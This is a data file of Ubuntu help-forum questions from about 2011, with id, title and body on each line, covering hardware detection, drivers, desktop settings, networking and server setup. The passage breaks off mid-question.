83972	ubuntu 10.04 lts not detecting ethernet	hp compaq 6200 pro mt desktop machine . i installed ubuntu 10.04.3 lts server edition . the installer said that it could not detect the network hardware , despite an ethernet cable being plugged in and a link light showing ; i tested the cable/connection/node on another machine and it works . i completed the installation , but ubuntu does not detect the ethernet card . lspci shows the card , but reports < access denied > for some of the specifications . i booted off a crunchbang linux ( debian-based ) live usb and it detects the network card and i get an ip address . rebooted into ubuntu server -- no network connectivity on the ethernet card . suggestions ? update : installed debian 6.0.3 ( cd1 ) from usb . it detected the network card during installation and configured the network . i rebooted into debian and network was working ; the machine has an ip address .
83975	how to install ubuntu on armv7 hardware ?	i was wondering how can i install normal ubuntu working version on a device that has an armv7 processor ?
83981	questions about hybrid graphic card asus/sony serie s	i am looking for a new laptop that i would like to be a bit polyvalent . however , i will use it mainly for research work ( programming , mathematica/matlab/python , heavy files analysis ) and up to now , i considered to continue to use ubuntu which fulfill all my work tasks except presentation stuffs ( openoffice/libreoffice is definitively not as better as powerpoint , so i had to install a windows virtual box ) . i usually do not play on linux , i reserve this to windows . i have made a selection of laptop , including the possibility to switch to macbook pro . i absolutely want a matt screen ( not glossy ) my preference is going to asus n55sf-s2190v with optimus and sony vaio se1v9e ( amd radeon hd 6630m ) and they have this hybrid system for the graphic card . my questions : concerning the vaio serie s with the amd radeon hd 6630m , is there also the same problem with ubuntu as with the optimus system ? one of the solution that i see is that i will not use probably the nvidia/amd graphic card for the my work , i will use it for game under windows . after the installation of ubuntu , which card is detected : the intel or the nvidia/amd ? i am thinking to have the dual boot and use the intel graphic card on linux and the other one while i am under windows for playing game/video etc.. does the discrete graphic card nvidia/amd consume power when it is not used under ubuntu ( without installing bumblebee ) then , once bumblebee is installed , how goes the autonomy ? i imagine that the automony is going down while switching on the dedicated card , but what about when it is switched off , ie when ubuntu uses only the intel graphics card with bumblebee ? i am not against to write command lines in the terminal but i am not a linux expert , i use it for my work because it is really practical and free . thank you in advance .
83984	how to know that an app uses which proxy settings	there are applications which do n't work over proxy . last time i tried software center did not work . update-manager also has issues connecting to proxy though there is a workaround . how do i find out where to change the proxy settings ? as far as i know there are three ways to do it gnome proxy settings using export http_proxy either for that instance or putting it in bashrc file /etc/apt/apt.conf for apt applications this is utterly confusing . i was helping a colleague in getting his update-manage to work over work proxy . i finally asked michal vogt and he reminded me that probably my colleague has not pressed `` apply system wide '' . i guess system-wide should be the default behaviour unless an app overrides it explicitly . next time if an app does not work over proxy , where should i look for ? is there a hint ? this question is not only for me but also for many people whom i help . i can not be sitting with them all the time . i need to tell them how to proceed .
83985	bad quality in cheese webcam booth software	i installed cheese webcam booth from software center to 11.10 , cheese worked beautiful in 11.04 but in .10 the image is so bad ( ive put a pic of it ) , i like the functionalities of it and dont want to use any other webcam softwares , is there a way to fix it ?
83986	ubuntu software center missing and can not install ?	my ubuntu was remove ubuntu software center because i want to reinstall again.but i used terminal ... i can not to install ubuntu software center.. : ~ $ sudo apt-get install software-center reading package lists ... done building dependency tree reading state information ... done package software-center is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source why ?
84005	how do i arrange windows with keyboard shortcuts ?	i have been testing with lubuntu and have found it really pleasant . however , i can not find an answer for one essential ( for me ) feature : being able to arrange windows with keyboard shortcuts . in ubuntu this is done with the `` grid '' plugin in `` compizconfig-settings-manager '' . unity uses this as well for window arranging . i am not interested in the `` drag to the left to take up 1/2 the screen '' , but rather just the `` hit some key combo '' to put the active window to the left 1/2 of the screen , for example . i found this entry in `` askubuntu '' asking a very similar question : is there a way to make openbox behave like the compiz grid plugin ? but it seems the `` answer to this question '' , namely pytile ( http : //sourceforge.net/projects/pytile/ ) , does n't do what i would like it to do . i do n't want to tile all current windows , i want to resize one window at a time as i specify ( left , right , top , center , bottom , 1/2 , 2/3 , 1/3 , etc. ) . and i would prefer to do so with the keyboard . i think it possible to install compiz in lubuntu , but this seems like `` overkill '' for this one feature ( grid keyboard shortcuts ) . any help out there ? it would really make my day ! ! !
84006	auto discovery of daap share through ssh tunnel	i got a remote machine ( somewhere else on the internet ) serving my music via daap through forked-daapd . i ssh to the remote machine , tunnelling remote port 3689 to local port 3689 ( which is the default daap port ) . on the local machine , when i start rhythmbox , it does n't auto discover the `` local '' daap share . i 'm able to add it manually , but that 's a tedious task , as i have to do it every time i start rhythmbox . my question is : what do i need to do to get rhythmbox to auto discover the daap share ? alternatively , is there some kind of rhythmbox conf file where i can add the daap share permanently ?
84007	find and replace text within multiple files	i want to know how i can find and replace a specific text in multiple files like in notepad++ in the linked tutorial . e.g . : http : //cybernetnews.com/find-replace-multiple-files/
84009	why gsettings is n't enough to reset my nautilus settings ?	i 'm trying to narrow down a bug ( to eventually report it or give up if it 'll turn out that resetting a simple setting will be enough to get rid of it ) i noticed that with a brand new user the bug does n't pop up so i tried to reset the config of my user 's nautilus i renamed .config/nautilus i renamed .nautilus2 ( strange name ... why the 2 ? ) and i did a gsettings reset-recursively org.gnome.nautilus strangely enough , it did n't work : as an example ( otherwise this is completely uninteresting ) i previously set up to use my home as the desktop folder , and now the key has correctly been resetted $ gsettings get org.gnome.nautilus.preferences desktop-is-home-dir false and yet on my desktop i see the contents of my home folder ( meaning that the dconf settings are not being respected ) i know that with the transition to gtk3 there 've been lots of changes ( before i should 've used gconf ... but now there 's dconf and gsettings ) , so there 're quite a bit of questions here about nautilus ... but these unfortunately now seem to be outdated
84019	how to turn off resizing of applications windows when changing between workspaces ?	there is an annoying `` feature '' in my ubuntu unity 11.10 . when i work in more than one workspace with several applications open , switching between workspaces allways resizes one of the application windows to maximum size - destroying my working layout and hiding the other open applications windows in the workspace . every time i switch workspace i need to resize one of the application windows . how can i change this behavior ?
84022	ways to install and uninstall programs in deb format	what are ways to install/uninstall programs in ubuntu . i will mention only .deb since it is the official package format and for example installing a .sh or .run program can typically be as simple as ( in latest ubuntu ) ./program.sh or sh program.run . also note that am talking about how to install packages in ubuntu , not talking about downloading a new installer ( like some super cow software center duke nukem version from sourceforge or something ) . only tools that already come in the repositories ( in any of the 4 standard ones , main , universe , restricted or multiverse ) . take into consideration all gui and terminal ways of doing it , with basic format of doing the installation . with this in mind i am talking for example about software center , synaptic , apt-get , aptitude , dpkg , etc ... a way to show all tools that are available in ubuntu to install deb packages . note - forgot , this should be community wiki since it will have all ways a user can install/uninstall something . like a friendly guide on doing that . updated question to remove the confusion some are having about sh/run files .
84023	using long double functions with gcc	i am having a hard time getting ubuntu 's gcc to understand the long double-manipulating functions from math.h , namely sqrtl , cabsl and cexpl . the message i get for all of them when compiling is undefined reference to `sqrtl' is there any flag other than -lm that i have to put on the command line for gcc to understand these functions ? is it a missing package ? or is this a problem with the version i 'm using ( 4.6.1 on oneiric ) ?
84025	packages needed in custom image of ubuntu to work with juju	hi am trying to run juju in my existing openstack infrastructure . since we don`t have direct access to internet , i need to change/modify my image and information of proxy . so far what i have understood is we need : - cloud-init a user with name `` ubuntu '' it will be good if we can add more in the thread so it becomes easy to use juju with custom ubuntu images as for internal infra and conditions cloud image might not be the only option . although i am also looking at https : //help.ubuntu.com/community/uec/images # ubuntu_cloud_guest_images_on_local_hypervisor_natty_onward a smoser suggested and see if i rework and modify the image as per need . i will populate the list with info . : )
84027	not able to switch users while resuming from suspend on a dell inspiron x8300	i am on dell inspiron x8300 desktop with ati radeon 5450 grahics card running ubuntu 11.10 , 64-bit . i am having a problem when switching users while resuming from suspend . when clicked on `` switch users '' while resuming from suspend , it takes me to the gdm login screen and after i enter my password , the screen goes blank and i see no activity . i can not switch the monitor using ctl+alt+f1 and i can not even logout using ctl+alt+backspace . the only way out is to restart using a hard power off . however , i am able to resume from suspend if i am not switching users and i am also able to switch users when not resuming from suspend . so , it seems like i have a workaround , by resuming the old session and then switching users , but it is annoying since my wife uses the desktop at night and i use it at the morning . any help would be appreciated !
84029	i need some data on the distribution of ubuntu users	i 'm a research scholar in jnu ( jawaharlal nehru university , new delhi ) . now i 'm doing a paper in international political economy of windows and ubuntu . these are two similar products that use different strategies . i need data related the circulation of ubuntu : how many users , which countries have more ubuntu users , etc . i have been searching for this for a long time .
84031	sharp preview thumbnails on desktop	since one can change the symbol size , e.g . for a preview thumbnail of a photo file on desktop , the preview looks very unsharp and unattractive . is there a way to modify this ? e.g . let the thumbnail generator spend more time on creating those preview icon symbols ? thanks
84032	how to bind to ctrl+alt+plus ?	i would like to bind volume up/down to ctrl+alt++ and - , but afaik the x server catches those key combinations and uses them for resolution change . now when i press ctrl+alt++ or - , nothing happens , and gnome does n't receive the keypresses either . how can i make these keys work for volume up/down ?
84033	where is the place where actual size of desktop icons is stored ?	as one can resize the icons on desktop ( not within nautilus ) through righ-click menu : `` resize icon.. '' , so where is the size stored for that certain file .
84038	update manager is in launcher and alt-tab list , but i ca n't switch to it	the update manager recently started itself and found two updates . i can tell by the icon in the launcher . the icon has a ( 2 ) on it and a little white arrow saying the application is running . i can also see the update-manager process in a 'ps -a ' list . alt-tab also shows the update manager . the problem is i ca n't get update manager to show up . if i click on the icon or alt-tab to it , nothing happens . i 've never had any issues starting it manually , but when it starts on it 's own after finding an update , i ca n't switch to it . what can i try to make this work better ?
84039	how to uninstall realplayer 11 ( gold ) ?	i accidentally installed sometime ago the realplayer to test embedding videos inside pdfs . anyhow this turned out not to work and would n't have been portable eitherway , so i decide to get rid of this tool again . since its not a package i can not uninstall with apt-get or dpkg . its realplayer 11 gold .
84045	how do i run a custom animated bootscreen ?	i want to create a new splash theme for ubuntu 11.10 using a volcano theme , so when it boots the volcano erupts with lava ( same for shutdown ) . now i have my image ( png ) but obviously it does not animate . i looked at the solar plymouth theme and i was thinking since the animation is there i can check it but no luck . is there a tool or a script i need to use to animate my volcano ? the image looks like this : i 've already got the animated image , i 'm just wondering how i can make it run at startup .
84049	can i change a linux swap partition to a file system without losing data ?	so i am using ubuntu 11.10 , just changed from windows to ubuntu , and one of my file systems , i accidentally set it up as a linux swap partition and now i want to acces my files , as i did in windows , but i do not know any secure way to change that partition to a file system without formating it and loosing the data . because i do not want to loose the data i have there . does deleting the partition and mounting it again solve the problem ?
84050	how do i disable the on-screen keyboard in the unlock screen ?	somehow , i activated the on-screen keyboard ( onboard ) in the unlock screen and i ca n't deactivate it now . i 've restarted the computer , but it 's still there in the unlock screen . how can i deactivate the on-screen keyboard in the unlock screen ?
84052	citrix client on ubuntu has focus problems	i installed citrix on a ubuntu 11.10 ( x86 ) , more or less the default configuration . everything seems to be fine but : dropdowns do n't behave nice , when clicking a drop down , i have problems to select items . sometimes i click on the right item but the wrong item gets select . in fact it 's pain to use the mouse , using keyboard everything is much easier . what could be the problem ? compositing window manager ? motif ? i followed the installation guide i posted here : citrix client installation and configuration in ubuntu 11.10 or 12.04 update : problem still exists with ubuntu 12.10 . there are focus issues which can be solved with windows maximizing/undoing maximizing . the problem is particularly severe in the ubuntu default config , xfce makes it less severe . about the installation , there is now an official ubuntu guide : http : //wiki.ubuntuusers.de/citrix_ica_client btw : i can assure that it 's a ubuntu problem , on windows it 's a non-issue .
84058	after installation on acer aspire one aoa150 the first boot got a black screen and nothing more	i have a aoa150 ( zg5 here in japan ) and install ubuntu 11.10 from a usb hdd pendrive . it work fine via usb when i decide to install everyhting got ok . when it finish i reboot as it said but the netbook could not reboot it only gives a black screen and a blink line upper left the monitor . i read through others similar question over here but none of them solved my problem .
84060	which nvidia drivers to use for dual-monitor support ?	i have a fresh installation of ubuntu 11.10 32-bit . the hardware i am running is : asus p5q pro 4gb ram nvidia geforce 9600gt 24 '' la2405wg connected via displayport ( shared with other machine ) 20 '' lp2065 connected by dvi ( shared with other machine ) intel core 2 quad q6600 @ 2.40ghz x4 when installed ubuntu only uses the 20 '' monitor . the system settings > display utility sees both screens , but when i enable the 24 '' monitor , it complains about the refresh rate i have set ( it flashes too quickly for me to see exactly what it says but it does mention 60hz which is what it is using accoring to xrandr . so i went to additional drivers and enabled what ubuntu [ recommended ] which was 'version current ' . this failed to load so i went for ( version current-updates ) . i then loaded nvidia-settings and configured the monitors as i wanted after a restart to activate the drivers . after restarting , the 24 '' monitor showed a blank white screen ( what is apparently a blank x display ) and the other monitor continued to work . this problem was my reason for rebuilding ubuntu so i removed the driver and installed version 173 . now in nvidia x server settings , when i click x server display configuration to setup my monitors , it says : unable to load x server display configuration page : failed to query noscanout for screen 0 . why is this so difficult ? ! which are the correct drivers to use ? i 'm a newbie so please excuse me if anything above is quite right ... i 'm struggling : s
84062	what version of opengl does g++ have ?	i 'm going to buy an opengl book from amazon but there are different versions for opengl 2 , 3 and 4 . which one does g++ use ?
84066	is it possible to place windows with keyboard shortcuts in gnome-shell ?	with compiz in unity , i could press ctrl-alt-6 to place a window on the right-half of the screen , ctrl-alt-4 to place it on the left half , ctrl-alt-7 to place it in the top left quarter of the screen , and so on . is there something similar in gnome-shell ?
84068	windows gets progressively slower over time , why does n't ubuntu ?	i , and many other previous windows users notice that the computer seems to get progressively slower over time . i bought a leapfrog crammer only to find it installed process that sat there waiting for me to plug the crammer in so it could run the software . it took up three percent of the cpu twenty-four seven , seven day a week ! this is one of the main reasons i left windows . but , ubuntu does n't seem to slow down over time at all . does ubuntu allow programs to install background programs like the leapfrog crammer did to sit there like a leech and suck away at resources ? could someone explain why windows tends to get slower over time , and is ubuntu vulnrable to this too ? thanks for any help , this is puzzling me .
84081	how to complete remove macbuntu ( even by formatting ) ?	i just format my root partition ( and keep my home partition ) , and reinstalled ubuntu 10.10 . but the theme of macbuntu is still there . if i try to run it 's `` uninstall.sh '' even with `` -- force '' i get `` the script is not able to determine what version is currently installed '' ( the version is 10.10 ) . by the way , i also deleted `` .macbuntu '' from my home directory , but i 'm still not able to uninstall it . any hint ?
84082	is it possible to show the bookmarks bar only in the home page using firefox ?	this is the standard behaviour in google chrome : unless otherwise specified , the bookmarks bar is visible only when in the home page , and disappears as soon as a web site is opened . this makes a lot of sense to me because i may want to see my bookmarks in the home page , but once i selected a site the bar becomes needless and wastes space .
84083	dropdown menu from panel on mouse hover	i was wondering if there is any way to make the global menu ( file , edit ... ... .messages etc ) drop down automatically when i hover my mouse pointer above it instead of clicking them ? ? ? im using ubuntu 11.10 unity desktop .
84091	how to uninstall vmware workstation 8 trial ?	i downloaded vmware workstation 8 trial and need to remove it completely . when i try to : sudo vmware-installer -u vmware-workstation it returns : sudo : vmware-installer : command not found i still have the trial bundle . so how can i remove vmware workstation ?
84094	is there a zoom function for unity 2d ?	gnome shell and unity ( 3d ) via compiz offer to zoom into the desktop . is there something similar for unity 2d please ?
84096	where did these monochrome thunderbird icons come from ?	i 'm running thunderbird 8 on ubuntu 11.10 , and i 'm stuck with these monochrome toolbar buttons that i hate . if i look under tools > add ons > appearance i 've only got the default theme installed and the sample icons are full color . the icons i 'm seeing are decidedly not full color . i was able to install the gnome tweak tool which let met change the rest of my unity icons to full color by switching the `` icon theme '' to `` unity-icon-theme '' ( it was unity-mono-dark ) . now only my thunderbird icons are monochrome . how is unity overriding the default thunderbird theme ?
84098	drop down menus stop working every so often	every so often drop down menus stop working in applications . this has happened in thunderbird and firefox . a quick fix is to restart the application .
84099	how to disable screen blanking when external monitor is connected and lid is closed	how to not blank the lcd screen when closing the laptop lid and using an external monitor ? i 'm using 11.10 oneiric and i 've already tried the dconf lid settings but without luck !
84101	seeing ubuntu-made files on an ntfs partition from within windows 7	i have a dual boot system in place , ubuntu/windows , each on its on physical hard drive since i also have srt active on the windows partition . the setup is as follows : disk 1 : - partition 1 : system ( windows 7 ) - partition 2 : storage ( ntfs ) disk 2 : - partition : ubuntu now , i can easily mount the windows partitions from ubuntu and read their files . i can even copy the files onto the partition in question ( storage - disk1/partition2 ) , and it works flawlessly . however , i can not see any files added by ubuntu when i boot windows up . so basically , windows only sees its own files on the partition , while ubuntu sees everything . is there something i need to do to make windows see ubuntu-made files ? keep in mind that the partition is ntfs , not ext2/3/4 , so windows does see it - just not the files which ubuntu makes ( and win7 does n't even take those files into account when calculating leftover free space on said partition - they are completely nonexistant to the os ) my goal is , essentially , to have one storage partition through which both operating systems could share files - thus having music , movies , code samples and downloads all in one place , accessible and changeable by both os - without having to resort to something like a physically separate network drive .
84103	how to install ubuntu with mbr ?	hello all , i have a very good question and i hope you can help me : as you know there 2 or maybe 3 ways to install ubuntu , the 2 ways that i know are : bootable installation ubuntu cd/dvd ubuntu wubi installer when you install from the cd/dvd by logical and previously you should have a free hard drive space or a unpartitioned space for installing ubuntu and also have windows os installed first , the problem is that when you install the grub/grub2 ( ubuntu or linux boot loader ) it delete the windows mbr ( master boot record ) . wubi dont have problem that , because you installed inside windows as a app and make a folder in you windows os , but wubi have many limitations like : disk space limitation , some times you what more that 31 gb low swap space , you have to re size your swap space , if you like to use ubuntu as a virtualization environment or development enviroment and many more as i was saying , the installation from the cd/dvd it seems better , it recognizes your pc hardware very well , it gives proper swap space and has more ubuntu full experiences plus do n't have wubi limitations like dose above , but if you have a windows issue like booting up issue , it is harder to solve that windows issue because grub does n't because he already delete the mbr and do n't let you pressing the f8 key or enter on windows system recovery . so what i want , if it is possible , is this have a ubuntu partion ( in my case 60gb ) but let you boot from the mrb like wubi instead of grub . my system specs : dell studio 1558 ubuntu 11.10 64 bit windows 7 home premium 64 bit below are more technical system specs see it from windows , ram , processor and more :
84105	microphone input background noise	i have a headset , and the microphone is working perfectly without background noise in windows , but in ubuntu 11.10 , the input has a very disturbing heavy noise . if i low the microphone volume on unamplified , it 's too low so that it does n't record anything . what 's the problem ?
84108	libreoffice problem integrating with unity	i have started noticing this problem a while back . opening spreadsheets directly from nautilus sometimes has different behaviors in unity . this means that sometimes i see the icon pop in the launcher like in the image below : other times i have the default libreoffice icon , even though i have a spreadsheet ( libreoffice calc ) open : and finally the worst case is when i do n't get any icon at all even though i have the spreadsheet open : in this final case i do n't even have the close/minimize/maximize window in the top left corner . i can only close it with alt+f4 . any idea why unity would behave like this ? i do n't see a special pattern for this occurrences . happens apparently random for both .ods and .xls files .
84111	how do i get a list of config options that a charm has ?	i tried to test a charm but it had configuration options and i was n't aware of them . short of browsing the charm itself how can i see what config options a charm has ?
84115	in simple terms , how do ext4 journaling file systems work ?	how does a journaling file system work and why does it not fragment , like ntfs ? why has n't windows switched over to a journaling file system ? co.uld someone please explain this to me ? thanks .
84116	how do i install bind9 with dlz dlopen drivers included ?	i 'm currently installing samba4 as for a -extra own chosen- schoolproject . i 'm following the howto installation from their website . now , i 'm stuck at getting my dns working . i 've installed bind9 with sudo apt-get install bind9 ( version 9.7.x ) . i 've added the samba4 named.conf file to my named.conf.local using include `` /usr/local/samba/private/named.conf '' ; . now when i try to restart my bind9 service using sudo /etc/init.d/bind9 restart i get the following error : unsupported dlz database driver 'dlopen ' . i 've googled the problem and all i could find was that my current version from bind9 did n't had dlz for dlopen . so i 've downloaded bind9 9.8.0p1 from the ics.org website and did sudo ./configure -- with-dlz-dlopen and then sudo make and then sudo make install . now i thought this should fix the problem but the problem still exists . named -v give me version 9.8.0p1 . all this is configured on the newest ubuntu ( 11.10 ) . so to make the question small : how do i install bind9 with dlz dlopen drivers included .
84126	why wo n't tomcat6 not bind to port 80 ?	i 'm aware of the implications of running tomcat on port 80 , but i 'm after a quick solution . i 'm trying to follow this tutorial . i 've followed the tutorial with two changes : tomcat6 is user name tomcat is run as the location of tomcat conf file : /usr/share/tomcat6/bin/catalina.sh but i 'm still getting permissions errors . java is saying its unable to bind to port 80 . what else should i be doing ? what other information should i provide for people to debug ? just to confirm , there 's nothing else running on port 80
84128	how do i know what process requires the keyring to be unlocked	at login the keyring always asks me to unlock it . it drives me crazy and can not find which process triggers this . is there any way to figure it out ?
84130	how do i theme the nautilus background image ?	i want to change the background image in the nautilus file browser . my idea is to put my own style in the background . i 'm using ubuntu 11.10 and nautilus is version 3 . i know that i have to change the nautilus.css file of the theme , but the problem is that there is not a parameter for the background . i just want to apply an image but i ca n't find the file or parameter to change it . the css file is in the directory /home/username/.theme/mytheme/gtk-3.0/apps . i 've changed the nautilus.css file . i wrote two new lines using css style but i do n't know where the correct place is to put it . the lines are : background-image : url ( `` carbon.jpg '' ) ; background-repeat : repeat ; obviously i put the image called carbon.jpg in the same directory of nautilus.css , but this change does n't work because i need to know whichs class displays the nautilus file browsing frame . if i find this class i guess that this code will work . if someone knows how to do it , please tell me because i really want to make this change .
84132	how to abort a stuck command in ubuntu server ?	i know there is ctrl+c , but sometimes that does n't work . in ubuntu desktop i can just close the terminal window and open a new one when this happens , but how would this be solved using the cli in ubuntu server ( without restarting the box ) ?
84144	weird graphical errors in console and on computer shut down	i am all new to ubuntu ( and linux in general ) and i am experiencing some strange graphic on my screen . console # 1 ( ctrl+alt+f1 ) : exactly the same happens on all the other consoles ( 2-6 ) , and the consoles do n't seem to work . and i see the same when i hibernate or shut down my computer , but not when i suspend it . i was thinking that it may have something to do with the sis 671 video driver work around that i use ? http : //ubuntuforums.org/showpost.php ? p=11476910 & postcount=773 any ideas how to fix this ?
84146	settings for gnome-shell window focus + `` it 's all text '' firefox extension + emacs	i have the following setup : ubuntu 11.10 gnome-shell emacs 23 firefox with `` it 's all text '' extension the purpose of the `` it 's all text '' extension is so that i can edit firefox text fields in an external editor , such as emacs . in fact , i am writing this from emacs . this extension is activated by pressing c-c c-e in firefox , which opens emacsclient with a tmp file linked to that text box . my question is , how can i have the emacs window come to the foreground after c-c c-e is pressed ? it seems to be the `` selected '' window ( i 'm not sure of the right terminology ) , but it does not bring itself to the foreground . how can i configure this behaviour to happen ? as a second question : i often have multiple emacs clients connected to a single emacs server . how can i control which emacs window receive 's the `` it 's all text '' temporary file ? i usually have one maximized emacs window ( a ) on one workspace and a smaller emacs window ( b ) on a desktop that also as firefox . i want to make sure that ( b ) is the one that gets sent to the foreground . thanks for the help !
84147	are there any small gui packages for ubuntu ?	i have just installed ubuntu 11.10 server , but i need a gui and ability to run programs like web browser . it does n't have to be pretty . i have checked gnome and kdefull - those require like 1300 and 1450 mb . quite too much ( and i have a slow connection , so it will take a while ) . there 's also gnome-core - 800 mb . is it usable , is it even a desktop ? are there any other minimalistic desktop packages ( gnome , kde or whatever ) ? p. s. i do n't care about size to download too much , what i really care about is ram consumption .
84155	setting up shared connection	i have a network that is connected to the internet via a switch connected to a router . i have it setup like this so i can work on the new network without causing problems on the old . anyway , i 'm trying to enable internet connection sharing . internet comes to server like this : modem - > router - > switch - > ubuntu 11.10 ( eth0 ) i want to share the connection through eth1 ( eth1 - > managed switch - > clients ) . here is my config for /etc/network/interfaces : i have a dhcp server running on eth1 . here is my config : ddns-update-style none ; option domain-name `` myserver.local '' ; option domain-name-servers 192.168.1.2 , 8.8.8.8 ; default-lease-time 600 ; max-lease-time 7200 ; authoritative ; subnet 192.168.1.0 netmask 255.255.255.0 { interface eth1 ; range 192.168.1.3 192.168.1.254 ; option routers 192.168.1.1 ; option subnet-mask 255.255.255.0 ; option broadcast-address 192.168.1.255 ; } here is /etc/network/interfaces : # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet dhcp # used for internal network auto eth1 iface eth1 inet static address 192.168.1.2 netmask 255.255.255.0 broadcast 192.168.1.255 network 192.168.1.0 here is /etc/hosts : 127.0.0.1 localhost 127.0.1.1 myserver.isp.com server 192.168.1.2 server.myserver.local server myserver.local in /etc/sysctl.conf , i 've set the following : net.ipv4.ip_forward=1 finally , in /etc/rc.local , i 've set the following : /sbin/iptables -p forward accept /sbin/iptables -- table nat -a postrouting -o eth1 -j masquerade when i ping 8.8.8.8 ( google 's dns ) from a client that is authenticated with my dhcp server ( they have been assigned a local ip , like 192.168.1.10 ) , i get a timeout . how can i debug this further to figure out where my problem is ?
84161	fwupd to update ocz revodrive firmware gets a 'permission denied ' error	try as i might i just do n't get it working http : //www.ocztechnology.com/ssd_tools/ocz_revodrive_and_revodrive_x2/ . there 's another thread here with an similar issue here : command is giving me `` bash : ./fwupd : can not execute binary file '' i 'm running command ./fwupd /dev/sdb which keeps returning me bash : ./fwupd : permission denied error . i have tried running both bit versions available of fwupd with both of the latest 32- and 64-bit ubuntu 11.10 , running the os from an usb stick , but to no avail ( could this be the problem ? ) . in the other thread it was suggested that chmod +x fwupd ( or chmod 0755 fwupd ) should resolve this issue , but at least for me it has been for naught . it was also suggested to install certain libraries , but those were already included in the ubuntu build and i did n't have any luck after updating with apt-get . i also tried giving fwupd more privileges , r , x and w but same charade , run it in different ways from different places ( where i 'd have the fwupd present , ofc ) among other things . what i also tried is giving the ubuntu 10.04 lts a shot but it did n't even launch on either of my computers , though that 's not the issue here . if anyone has any ideas on what the problem is and how i could get this working , it would be most appreciated !
84162	permission denied on /dev/xvdf despite sudo ?	i 'm trying to get a stream off port 9999 and write to /dev/xvdf . i 'm using amazon ec2 with the ubuntu 11.10 server image . by default i log in as 'ubuntu ' which has sudo privileges . however , when i run the following netcat command , i get this error ubuntu @ ip-10-252-35-122 : ~ $ ls -al /dev/xv* brw-rw -- -- 1 root disk 202 , 1 2011-11-30 22:22 /dev/xvda1 brw-rw -- -- 1 root disk 202 , 80 2011-11-30 22:27 /dev/xvdf ubuntu @ ip-10-252-35-122 : ~ $ sudo netcat -p 9999 -l > /dev/xvdf bash : /dev/xvdf : permission denied ubuntu @ ip-10-252-35-122 : ~ $ any idea why i get the permission denied error and how i can work around it ? update : something mysterious is running in the background that resets the permissions ? check the snippet below and the permission flags seem to automatically reset when i try using /dev/xvdf ! ? ! ubuntu @ ip-10-252-35-122 : ~ $ sudo chmod 777 /dev/xvdf ubuntu @ ip-10-252-35-122 : ~ $ ls -al /dev/xvdf brwxrwxrwx 1 root disk 202 , 80 2011-11-30 22:43 /dev/xvdf ubuntu @ ip-10-252-35-122 : ~ $ sudo nc -p 9999 -l > /dev/xvdf this is nc from the netcat-openbsd package . an alternative nc is available in the netcat-traditional package . usage : nc [ -46ddhklnrstuuvzc ] [ -i interval ] [ -p proxy_username ] [ -p source_port ] [ -s source_ip_address ] [ -t tos ] [ -w timeout ] [ -x proxy_protocol ] [ -x proxy_address [ : port ] ] [ hostname ] [ port [ s ] ] ubuntu @ ip-10-252-35-122 : ~ $ ls -al /dev/xvdf brw-rw -- -- 1 root disk 202 , 80 2011-11-30 22:43 /dev/xvdf ubuntu @ ip-10-252-35-122 : ~ $ i 'm using stock ubuntu amazon ec2 images from http : //alestic.com/ ( links to images at the top )
84164	system freeze , on exit from screensaver ( unity )	i have a midrange pc ( intel core2-duo 3ghz , 4gb ram , 1.5tb storage ) , with latest ubuntu 11.10 ( oneiric ) and unity ( 3d ) . description : pc does not always return control after automatic timeout to screen-saver -- does not prompt for password , keyboard and mouse are still active but non-functional , and is non-recoverable ( requires power-off ) . this appears to be a race condition between mouse and keyboard . when i absently move mouse ( to exit screensaver ) and then quickly enter password ( unprompted ) , this lockup condition occurs .. is this a known issue ? can it be resolved ? a similar mouse/keyboard zombie-state is described in : ( but for ubuntu 11.04 ) freeze when resuming from screensaver or monitor-sleep-state update since update to kernel 3.0.0-14 ( today ) this has happened 3 times .
84165	sound disappeared in 11.10	so , ubuntu 11.10 is still disappointing me . now , my sound disappeared . nothing in vlc , nothing in other players . what should i do ? 00:1b.0 audio device [ 0403 ] : intel corporation 5 series/3400 series chipset high definition audio [ 8086:3b56 ] ( rev 06 )
84168	how i can install age of mythology on ubuntu ?	i have a problem installing age of mythology gold edition ( v 1.03 ) . at the beginning of installation in wine ( 1.3.28 ) on my ubuntu 11.10 , and after entering the serial and click next , i get an error `` unable to load pidgen.dll '' and return to the previous window . in configure wine and in the libraries tab i added the missing dll but nothing has changed . i tried everything but noting was working . i have also tried to install it in a virtual machine with vmware workstation 8.0.1 and microsoft windows xp sp3 and i get a compatibility error with video card : video card 0 : vmware svga ii vmx_fb.dll vendor ( 0x15ad ) device ( 0x405 ) and installing screen closes . i think the solution in this case would increase the amount of video available to the vmware virtual machine or a driver for this card , but do n't know how to do that . maybe someone knows how to tweak video card to work with vmware or tweak video memory to the virtual machine . i searched several sites , but none solved my problem . please , if someone can answer this question . i also apologize if the translation is not well understood . i used the google translator . thanks and greetings from latin america originally spanish .
84170	can i set dual external monitors on thinkpad x220 ?	i 'm running ubuntu 11.10 on thinkpad x220 . browsing through thinkwiki pages i stumbled upon this information : multiple monitors configuring an extended desktop over two monitors led to malfunction . side-by-side worked , one above the other did not . in natty the solution was just to avoid the layouts that caused the malfunction . the problems appear to have been completely solved in ubuntu 11.10 ( oneiric ocelot ) . has anyone of you managed to make x220 work with dual monitor setup ? does it require ultrabase ? any special tweaks or modifications ? thanks for help !
84171	does picasa web album have compressed pictures if no then how to download complete album using firefox	please refer to ca n't download web photo albums to picasa the question is bit old hence starting again with more information to it : i can download photos from picasa with no issues , however when i click on download album , i receive : firefox does n't know how to open this address , because the protocol ( picasa ) is n't associated with any program . i 've picasa 3.0.0 ( 57.442 ) version installed on ubuntu 11.10 entirely unrelated but why ca n't google release native app ? i do n't like using it under wine ( yes i know i downloaded .deb but actual app uses wine ) anyways following comment at http : //sandyiit.blogspot.com/2008/09/picasa-30-download-web-albums-in.html . i looked at about : config for firefox and verified that i 've following lines : network.protocol-handler.external.picasa value true network.protocol-handler.app.picasa value /usr/bin/picasa location of picasa : which picasa /usr/bin/picasa ls -l /usr/bin/picasa lrwxrwxrwx 1 root root 33 2008-11-07 17:04 /usr/bin/picasa - > /opt/google/picasa/3.0/bin/picasa so i tried changing network.protocol-handler.app.picasa value /opt/google/picasa/3.0/bin/picasa that did not help . firefox - > edit - > preferences - > applications , does n't have anything related to picasa . btw chrome opens up a dialog : which says chrome requested to open a program xdg-open i thought it should be picasa ? well in any case saying ok to pop up does nothing . so again after following : http : //sandyiit.blogspot.com/2008/09/picasa-30-download-web-albums-in.html search for text : _album.picasa = copy the text after the equal to sign to notepad . find and replace '\x2f ' by '/ ' ( without the single 